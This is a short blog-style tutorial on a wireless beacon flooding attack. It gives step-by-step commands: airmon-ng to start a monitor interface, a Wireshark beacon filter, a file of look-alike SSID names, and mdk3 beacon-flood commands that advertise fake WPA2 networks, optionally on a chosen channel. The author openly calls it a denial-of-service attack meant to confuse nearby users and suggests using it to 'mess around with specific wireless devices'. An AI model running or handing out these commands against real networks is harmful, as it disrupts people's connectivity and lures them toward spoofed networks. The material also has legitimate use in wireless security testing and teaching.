Beacon Flooding Attack

This attack scenario concerns the connectivity confusion of a wireless client. We are going to transmit countless fake beacon frames. After some time the available wireless networks are so many that the user is totally confused and lost in a large list of networks.

Steps:

Create a monitoring interface with the following command:

airmon-ng start INTERFACE

You can capture beacon frames in Wireshark with the following filter:

wlan.fc.type_subtype == 0x08

To better target clients, I created a dictionary file with SSID names similar to the surrounding network names (each on separate line):

nano ssid_names.txt

To begin transmitting the beacon frames, I’ll use the mdk3 tool with the b (beacon flooding mode), -a (advertise a WPA2 network), -g (advertise a 54Mbps network) and -f (use the provided dictionary file):

mdk3 MONITOR_INTERFACE b -a -g -f ssid_names.txt

In case, you want to mess around with specific wireless devices, you have the ability to specify the channel number.

mdk3 MONITOR_INTERFACE b -a -g -f ssid_names.txt -c CHANNEL

This is also a Denial of Service type of attack, which means it is active. Wireless intrusion detection and prevention systems are likely to be triggered.

Before you go

Thank you for taking the time to read my article. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏